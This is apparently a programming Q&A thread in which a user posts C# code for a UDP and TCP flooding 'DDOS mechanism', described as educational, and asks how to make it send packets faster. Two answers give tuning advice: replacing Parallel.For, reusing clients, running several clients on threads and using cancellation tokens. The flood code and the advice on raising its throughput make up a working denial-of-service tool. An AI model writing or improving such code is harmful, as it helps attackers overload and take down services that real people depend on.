# DDOS Mechanism: Improving thread safety & loop speed?

Tags: c#, .net

I'm pretty new to this but I coded a DDOS mechanism for educational purposes. I need to know if the thread safety can be improved (Right now I have none, but do I need any?) and if the loop speed can be improved (can data be sent any faster)?

```
public class SessionWorker : ISessionWorker
{
    private ISession _session;
    private readonly Task _cycleTask;
    private bool _cycleActive;

    public SessionWorker()
    {
        _cycleTask = new Task(OnCycle);
    }

    public void Load(ISession session)
    {
        _session = session;
    }

    public void Start()
    {
        _cycleTask.Start();
        _cycleActive = true;
    }

    public void Stop()
    {
        _cycleActive = false;
    }

    private void OnCycle()
    {
        if (_session.AttackType == SessionAttackType.Udp)
        {
            CycleUdp();
        }
        else
        {
            CycleTcp();
        }
    }

    private void CycleUdp()
    {
        while (_cycleActive)
        {
            if (!_session.IsAttacking || _session.HasAttackExpired())
            {
                _session.StopAttack();
                continue;
            }

            var udpClient = new UdpClient(_session.AttackingIp, _session.AttackingPort);

            Parallel.For(1, 10, i =>
            {
                if (!_session.IsAttacking || !_cycleActive)
                {
                    return;
                }

                var rubbish = new byte[1];

                udpClient.Send(rubbish, rubbish.Length);
                _session.BytesSent += rubbish.Length;
            });

            Thread.Sleep(2);
        }
    }

    private void CycleTcp()
    {
        while (_cycleActive)
        {
            if (!_session.IsAttacking || _session.HasAttackExpired())
            {
                _session.StopAttack();
                continue;
            }

            var tcpClient = new TcpClient();

            Parallel.For(1, 10, i =>
            {
                if (!_session.IsAttacking || !_cycleActive)
                {
                    return;
                }

                var rubbish = new byte[1];

                tcpClient.Client.BeginSend(rubbish, 0, rubbish.Length, SocketFlags.None, ar => tcpClient.Client.EndSend(ar), tcpClient);
                _session.BytesSent += rubbish.Length;
            });

            Thread.Sleep(2);
        }
    }
}
```

Other parts of the code?

```
public bool HasAttackExpired()
{
    return (DateTime.Now - AttackExpiration).TotalSeconds < 1;
}
```

StopAttack method:

```
public void StopAttack()
{
    if (IsAttacking && HasAttackExpired())
    {
        CoreUtilities.LogToConsole("Finished running an attack and sent " + BytesSent + " bytes.");
    }

    IsAttacking = false;

    AttackingIp = "";
    AttackingPort = 0;

    SessionWorker.Stop();
}
```

Answer (score 3):

> ```
> private bool _cycleActive;
> ```

You actually don't need this variable. The `Task` class has a [`Status`](https://msdn.microsoft.com/en-us/library/system.threading.tasks.taskstatus(v=vs.110).aspx) property.

---

> ```
> Thread.Sleep(2);
> ```

And the `async/await` classic one (like the classic `namespace std` in c++). You don't want to block your thread with that. Instead, you should use `Task.Delay` and make your code `async`

---

> ```
> public void Stop()
> {
>     _cycleActive = false;
> }
> ```

For stopping you should use the `CancellationTokenSource` and the `CancellationToken`. See [Task Cancellation](https://docs.microsoft.com/en-us/dotnet/standard/parallel-programming/task-cancellation).

Comment: It looks like OP actually wants to suspend his thread for `2ms` (for whatever reason). In which case `Thread.Sleep` is correct method to call. He does not use async programming model.

Comment: @NikitaB true, he's not, but it looks like he actually is trying to... seeing the way he's doing this...

Answer (score 2):

I am no expert on malicious code, but I guess the only way to know for sure what works best is to run some [packet analyzer](https://www.wireshark.org/)  software on both client and server, and see for yourself.

I feel like your implementation uses too many threads. `Parallel.For` loop probably hurts more than it helps. It speeds things up only if you execute a sufficiently complex task on every iteration. Sending 1 byte over network is not complex at all. Try replacing it with regular `for` loop.

It is also unclear what `2` in `Thread.Sleep(2)` stands for. Why it is `2` and not, say, `3`, and why you should "sleep" at all. If it is required, then maybe it should be a property of your session, and not a hard-coded value.

Clients implement `IDisposable`, so you should dispose them at some point. I also don't see why you should create a new client on every iteration. Can't you re-use single instance?

Another obvious thing to try is to run multiple clients on multiple threads. Maybe it will work "better". Maybe not.

P.S. As for your thread safety concern: [see SO answer](https://stackoverflow.com/a/2583370/1386995). So no, calling `Send` or `BeginSend` in parallel from different threads in not thread safe.